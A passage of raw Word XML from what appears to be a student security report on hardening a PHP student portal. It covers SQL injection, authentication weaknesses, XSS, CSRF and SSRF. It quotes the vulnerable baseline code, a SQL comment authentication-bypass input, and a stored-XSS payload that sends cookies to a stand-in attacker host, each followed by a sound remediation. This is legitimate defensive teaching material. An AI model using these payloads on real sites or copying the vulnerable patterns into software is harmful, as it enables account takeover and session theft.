          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable baseline built the login query by concatenating the submitted identifier directly into a SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>string, and compared passwords using an unsalted MD5 digest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73373CE5"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$sql = "SELECT * FROM users WHERE email = '$identifier' AND password = '" . md5($password) . "'";</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$result = $conn-&gt;query($sql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29280EDC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An identifier value of  admin@example.test' -- (with a trailing sp</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ace)  closes the quoted string early and comments out the rest of the query, including the password check entirely — authenticating as admin@example.test with no valid password at all. The same pattern permits UNION-based data exfiltration through other in</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>jectable fields (see 4.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CED688" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>4.2 Remediation: Parameterised Queries Throughout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08D342" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every database call in the hardened application goes through a single wrapper, Database::run(), which prepares the statement and binds parameters using PDO with client-side </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emulation disabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9D5920"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self::$instance = new PDO($dsn, $db['user'], $db['pass'], [</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    PDO::ATTR_ERRMODE            =&gt; PDO::ERRMODE_EXCEPTION,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    PDO::ATTR_DEFAULT_FETCH_MODE =&gt; PDO::FETCH_ASSOC,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    PDO::ATTR_EMULATE_PREPARES   =&gt; false,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32711746" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With emulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> disabled, the driver sends the SQL text and the bound values to MySQL as separate protocol messages, so a bound value can never alter the query's structure, no matter what characters it contains. The login lookup becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796B724"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$stmt = Database::run(</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    'SELE</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CT id, matric_no, email, password_hash, full_name, role, is_active</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     FROM users WHERE email = ? OR matric_no = ? LIMIT 1',</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    [$identifier, $identifier]</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFCAA55" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The same pattern is used for the admin student search (Section 5.4), course enrolment, profile u</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pdates, and every other query in the codebase — there is no method anywhere in src/Database.php that accepts raw, user-influenced SQL text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F58F2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>4.3 Finding: Weak Authentication Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A3FC21" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Beyond the injection flaw itself, the vulnerable baseline had three furthe</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>r authentication weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C4B04" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Passwords hashed with unsalted MD5, which is fast to compute and has no per-user salt, making offline cracking of a leaked database trivial with commodity hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A6A7CE" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No limit on login attempts, allowing unlimited automated passw</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ord guessing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64804B06" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No session ID regeneration on login, leaving the application open to session fixation (an attacker who can set a victim's session ID before login can reuse that same ID afterwards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB0012" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Distinct error messages (“No account found with that email” </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vs. a wrong-password message) that let an attacker enumerate valid accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE72AE" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>4.4 Remediation: Argon2id, Rate Limiting, Lockout, and Session Regeneration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21124345" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Password hashing now uses Argon2id, a memory-hard algorithm resistant to GPU/ASIC cracking, with tuned </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cost parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB8189"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return password_hash($password, PASSWORD_ARGON2ID, [</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    'memory_cost' =&gt; 65536, // 64 MB</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    'time_cost'   =&gt; 4,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    'threads'     =&gt; 1,</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52954BF2" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Login attempts are rate-limited per identifier and per IP address (maximum 5 failed attempts in </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a 15-minute window), after which the account enters a 15-minute temporary lockout recorded in the account_lockouts table. Every login failure, lockout, and denial returns the identical generic message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F6153"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Invalid credentials, or this account is temporarily l</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ocked. Please try again later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9581E5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This message is shown whether the identifier doesn't exist, the password is wrong, or the account happens to be locked, so an attacker cannot distinguish these cases from the response alone. Response timing is also equalised:</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> password_verify() is always executed, even when no matching user was found, by checking the submitted password against a fixed dummy hash — so a missing account does not respond measurably faster than a wrong password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A518BD" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On every successful authentication, </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the session ID is regenerated before any identity is stored in the session, closing the fixation window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B2EFBC"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Session::regenerate(); // session_regenerate_id(true)</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$_SESSION['user_id'] = $user['id'];</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$_SESSION['role']    = $user['role'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA400C5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A secure password-rese</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>t flow rounds out the authentication hardening: reset tokens are generated with random_bytes(32), only their SHA-256 hash is ever stored, they expire after 30 minutes, and they are single-use (marked used_at on redemption). A database compromise alone ther</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efore cannot be used to forge a working reset link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABE80F9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:r w:rsidRPr="00267CCC">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2966B097" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:lastRenderedPageBreak/>
        <w:t>5. Task 3: Web Application Defences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63916C6A" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>5.1 Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF91D5C" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finding: the profile page rendered the student-editable bio field directly into HTML with no encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8401E"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&lt;div class="bio"&gt;&lt;?php</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo $user['bio']; ?&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F095BD" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A bio value of  &lt;script&gt;document.location='https://attacker.test/c?'+document.cookie&lt;/script&gt;  executes in the browser of every user who later views that profile, including an administrator browsing the student list — a classic</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored-XSS session-theft chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AD6181" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation: every dynamic value passed into HTML goes through a single output-encoding helper, e(), which applies htmlspecialchars() with ENT_QUOTES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8276CC"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function e(?string $value): string {</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return htmlspecialchars($value</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ?? '', ENT_QUOTES, 'UTF-8');</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611416EC" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is paired with a restrictive Content-Security-Policy response header (script-src 'self', object-src 'none', frame-ancestors 'none') applied globally, so that even an encoding mistake elsewhere in the codebase could not </w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>execute an injected inline script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC03905" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>5.2 Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B585421" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finding: state-changing forms (profile update, course enrolment, document upload) had no anti-CSRF token, so a forged form hosted on any other site could submit the same request autom</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atically, using the victim's authenticated session cookie, the moment the victim visited that page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A02B44" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remediation: a per-session token, generated with random_bytes(32) and compared using the constant-time hash_equals(), is required on every state-changing PO</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ST request and rotated after each successful use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A888CC"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if (!Csrf::verify($_POST['csrf_token'] ?? null)) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Logger::log('csrf_rejected', $user['email'], Logger::clientIp(), ['form' =&gt; 'course_enrol']);</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    $error = 'Your session expired. Please reload the pa</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ge and try again.';</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194E3B0" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is combined with SameSite=Lax on the session cookie as defence in depth: even a same-site navigation cannot silently include the session cookie in a cross-origin POST originating from a different site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF87CA" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:t>5.3 Server-Side Request For</w:t>
      </w:r>
      <w:r w:rsidRPr="00267CCC">
        <w:t>gery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B393AB5" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finding: the “link preview” feature fetched whatever URL the client supplied with no restriction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E0D64"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$content = file_get_contents($_POST['url']); // fetches ANY URL, follows redirects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA494C9" w14:textId="77777777" w:rsidR="007B5C98" w:rsidRPr="00267CCC" w:rsidRDefault="00203D5A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00267CCC">
        <w:rPr>
